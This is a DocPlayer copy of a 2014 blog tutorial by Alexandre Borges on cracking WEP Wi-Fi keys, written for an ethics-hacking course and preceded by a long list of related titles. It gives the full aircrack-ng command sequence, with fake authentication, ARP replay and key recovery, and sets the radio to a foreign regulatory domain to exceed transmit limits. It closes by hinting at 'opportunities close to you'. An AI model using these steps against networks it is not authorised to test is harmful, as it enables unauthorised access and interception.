ALEXANDRE BORGES BLOG

Similar documents
WEP WPA WPS :: INDEX : Introduction :

MITM Man in the Middle

WEP WPA WPS :: INDEX : Introduction :

Wireless LAN Pen-Testing. Part I

Wireless Sniffing with Wireshark

Setting Up and Managing your Network

S /3133 Networking Technology, laboratory course A/B

The Wireless Network Road Trip

IEEE bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm

An Experimental Study Analysis of Security Attacks at IEEE Wireless Local Area Network

Wiereless LAN

WiFi Security Assessments

Kali Linux Cookbook. Willie L. Pritchett David De Smet. Chapter No. 9 "Wireless Attacks"

Wifi Penetration. Wireless Communication and Computer/Network Forensics

Lab Exercise Objective. Requirements. Step 1: Fetch a Trace

Tube-U(G) Long-Range Outdoor IEEE g USB Adapter User s Guide

Wireless Network Security. Pat Wilbur Wireless Networks March 30, 2007

Offensive Security. Wireless Attacks - WiFu

WiFi. Is for Wireless Fidelity Or IEEE Standard By Greg Goldman. WiFi 1

WUA Mbps Wireless USB Network Adapter

0) What is the wpa handhake?

EWLEA a/b/g/n WLAN MiniPCI Express card

Interested in learning more about security?

Tutorial on Network Management and Measurements. Tasos Alexandridis

Long-Range 500mW IEEE g Wireless USB Adapter. User's Guide

WRE6505. User s Guide. Quick Start Guide. Wireless AC750 Range Extender. Default Login Details. Version 1.00 Edition 1,

Basic processes in IEEE networks

ECE 4893: Internetwork Security Lab 10: Wireless Security

Fedora 13 Wireless Guide

Wireless Hacking Haifux. Wireless Hacking. Edri Guy. Mar 04,2013. See-Security. Mar Wireless Hacking - Haifux

Setting up WiFi with BeagleBone Black

WRE2205. User s Guide. Quick Start Guide. Wireless N300 Range Extender. Default Login Details. Version 1.00 Edition 1, 06/2012

CSE331: Introduction to Networks and Security. Lecture 6 Fall 2006

Hacking. Aims. Naming, Acronyms, etc. Sources

Virtual Access Points

WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 6. Wireless Network Security

Document ID: Contents. Introduction. Prerequisites. Requirements. Components Used. Related Products. Conventions. 802.

Introduction to Network Security Lab 1 - Wireshark

WAP3205 v2. User s Guide. Quick Start Guide. Wireless N300 Access Point. Default Login Details. Version 1.00 Edition 2, 10/2015

Wireless Technology Seminar

Methodology: Security plan for wireless networks. By: Stephen Blair Mandeville A. Summary

Authentication in WLAN

Wireless Pre-Shared Key Cracking (WPA, WPA2)

Vulnerabilities of Wireless Security protocols (WEP and WPA2)

PENETRATION TESTING ON A WIRELESS NETWORK.

IEEE a/ac/n/b/g Enterprise Access Points ECW5320 ECWO5320. Management Guide. Software Release v

DefCon 22. Wireless Penetration Testing and How to WCTF

WEP Overview 1/2. and encryption mechanisms Now deprecated. Shared key Open key (the client will authenticate always) Shared key authentication

SSI. Commons Wireless Protocols WEP and WPA2. Bertil Maria Pires Marques. Dez Dez

Oudot Laurent

SX-6K3-EVK-SD User Guide

54M/150M/300Mbps USB WIRELESS ADAPTER. User s Manual Version 1.8

ICP DAS WF-2571 FAQ. FAQ Version 1.0. ICP DAS Co., Ltd

USER GUIDE Cisco Small Business

Configuring Your Network s Security

Wireless LAN Security: Securing Your Access Point

Security in IEEE WLANs

WI-FI VS. BLUETOOTH TWO OUTSTANDING RADIO TECHNOLOGIES FOR DEDICATED PAYMENT APPLICATION

NWA1120 Series. User s Guide. Quick Start Guide. Wireless LAN Ceiling Mountable PoE Access Point. Default Login Details

Wireless USB Adapter

EAP N Wall Mount Access Point / WDS AP / Universal Repeater

Wireless g CF Card User Manual

WHITE PAPER. WEP Cloaking for Legacy Encryption Protection

ALL0233 Wireless-N USB Dongle User Guide

Security Awareness. Wireless Network Security

Wireless Encryption Protection

IEEE 802 Protocol Layers. IEEE Wireless LAN Standard. Protocol Architecture. Protocol Architecture. Separation of LLC and MAC.

54M/150M/300Mbps USB WIRELESS ADAPTER. User s Manual Version 2.0

Wireless LAN Protocol CS 571 Fall Kenneth L. Calvert All rights reserved

User Manual. WLAN USB Adapter for b/g

PwC. Outline. The case for wireless networking. Access points and network cards. Introduction: OSI layers and 802 structure

LevelOne User Manual WPC-0600 N_One Wireless CardBus Adapter

Markku Renfors. Partly based on student presentation by: Lukasz Kondrad Tomasz Augustynowicz Jaroslaw Lacki Jakub Jakubiak

802.11n a/b/g wifi 3x3 mini-pci module, MB82/AR9160+AR9106. Model: DNMA-83

300Mbps Wireless N Gigabit Ceilling Mount Access Point

9 Simple steps to secure your Wi-Fi Network.

WLAN w Technology

Building secure wireless access point based on certificate authentication and firewall captive portal

300Mbps Wireless N Ceiling Mount Access Point

WIRELESS SECURITY TOOLS

300Mbps Wireless N Gigabit Ceilling Mount Access Point

Introduction on Low level Network tools

TECHNICAL NOTE. GoFree WIFI-1 web interface settings. Revision Comment Author Date 0.0a First release James Zhang 10/09/2012

Network Attacks. Common Network Attacks and Exploits

Cisco Aironet Wireless Bridges FAQ

Key Features. Multiple Operation Modes ENH500 can operate into four different modes with Access Point, Client Bridge, Client Router and WDS Mode.

DIR-806A. Wireless AC750 Multi-Function Router. DUAL BAND Simultaneous operation in 5GHz band and 2.4GHz band, a/b/g/n/ac compatible

ECB GHz Super G 108Mbps Access Point/Client Bridge/Repeater/WDS AP/

ENHWI-N n Wireless Router

Wireless Networks. Welcome to Wireless

Golden N Wireless Mini USB Adapter. Model # AWLL6075 User s Manual. Rev. 1.2

NBG2105. User s Guide. Quick Start Guide. Wireless Mini Travel Router. Default Login Details. Version 1.00 Edition 1, 11/2012

A world with free wireless internet access How safe are you?

2.4GHz / 5GHz Dual CPU 600Mbps 11N AP/Router

Key Features. EnGenius Outdoor Base Station designs High Power, High Sensitivity and Strong Reliability Solutions under Harsh Environment.

Network Security. Security in local-area networks. Radboud University, The Netherlands. Autumn 2015

Transcription:

Cracking WEP Networks Author: Alexandre Borges Date: FEB/20/2014 Revision: 1.0 ALEXANDRE BORGES BLOG When I ve published the first document about Cracking Wireless Networks (http://alexandreborgesbrazil.files.wordpress.com/2014/02/cracking_wireless.pdf) some friends of mine had asked to make a document about cracking WEP and, as this week I m teaching a CEH course, I decided to write this short article. Honestly, I believe most security professionals know how to crack WEP wireless network, but it follows a very straight document and trying to don t make commom mistakes I ve seen in other blogs such as to pin a channel for the wireless search. I ve used for this demonstration Kali Linux (http://www.kali.org/downloads/), a Cisco home wireless router configured to use WEP and the very famous external wireless card Alfa AWUS036H. It s completly possible to execute same steps using a internal wireless card since it s supported by aircrack suite. Let s go: 1) The first step is to collect information about installed network interface cards in the system: root@hacker:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx- Power=27 dbm Encryption key:off Power Management:off vmnet8 eth0 lo wlan0 IEEE 802.11bgn ESSID:"SOLARIS11" Mode:Managed Frequency:2.437 GHz Access Point: CC:B2:55:D0:16:54 Bit Rate=130 Mb/s Tx-Power=16 dbm Encryption key:off Power Management:on Link Quality=61/70 Signal level=-49 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:796 Invalid misc:50 Missed http://alexandreborges.org Page 1

beacon:0 vmnet1 2) To change some network interface attributes, the wlan1 interface was took down, we ve changed its regulator country to Bolivia (local where is permited a higher transmission power) and we ve altered txpower property to 30 (almost 1W): root@hacker:~# ifconfig wlan1 down root@hacker:~# iw reg set BO root@hacker:~# iwconfig wlan1 txpower 30 3) I ve configured the wlan1 interface to monitor mode (something like promiscuous operation) and brought it to up: root@hacker:~# iwconfig wlan1 mode monitor root@hacker:~# ifconfig wlan1 up root@hacker:~# iwconfig wlan1 wlan1 IEEE 802.11bg Mode:Monitor Frequency:2.437 GHz Tx- Power=30 dbm Power Management:off 4) So far we ve configured the basic infrastructure, then let s move to crack a WEP wireless network. Next command start a general scanning for wireless networks (over all channels): root@hacker:~# airodump-ng wlan1 For this test we re going to choose the wireless network named Hacker. Figure 1 http://alexandreborges.org Page 2

5) The main task is to collect packages from Hacker wireless network because we need to have around 50.000 IVs (initialization vectors) to be able to crack and find the WEP key out, then we need to start to collect the packages and to associate to this target wireless network. Starting to collect packages (and IVs): root@hacker:~# airodump-ng -c 1 --bssid 00:25:9C:76:62:8F -w cap_course_1.txt wlan1 From previous executed command: -c channel which is configured the Hacker wireless network according Figure 1. --bssid the router MAC address -w write to file named cap_course_1.txt For associating to Hacker wireless network: root@hacker:/# aireplay-ng -1 0 -a 00:25:9C:76:62:8F wlan1 Figure 2 23:34:11 Waiting for beacon frame (BSSID: 00:25:9C:76:62:8F) on channel 1 23:34:12 Sending Authentication Request (Open System) 23:34:14 Sending Authentication Request (Open System) [ACK] 23:34:14 Authentication successful 23:34:14 Sending Association Request [ACK] 23:34:14 Association successful :-) (AID: 1) The -1 option means fake authentication, 0 means reassociation timing (seconds) and a is the BSSID (AP MAC). 6) With packages being collected, it s timely to force IVs production to accelerate the process and this is done executing: root@hacker:~# aireplay-ng -3 -b 00:25:9C:76:62:8F -a 00:25:9C:76:62:8F wlan1 http://alexandreborges.org Page 3

Figure 3 The -3 selects ARP request replay attack and b is the BSSID.The big question is: when is it recommended to stop the package collection? As it s needed to gather 50.000 IVs at least, then a good guess is to collect more than 200.000 packets, but it s only a rough guess. I suggest you leaving packets being collected until around 300.000 or 400.000 packets to assure you ll break WEP.Wow, I almost forget: the Hacker wireless network must have often access to cause a big production of IVs. It s a relevant condition. Finally, the great moment: let s to crack and find the WEP key out: root@hacker:~# aircrack-ng cap_course_1.txt-01.cap Figure 4 http://alexandreborges.org Page 4

Amazing! The WEP key was found: AA:BB:CC:DD:EE. Nowadays, it isn t so common to find an WEP network, but there re lot opportunities close to you. Have a nice day. Alexandre Borges. http://alexandreborges.org Page 5

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information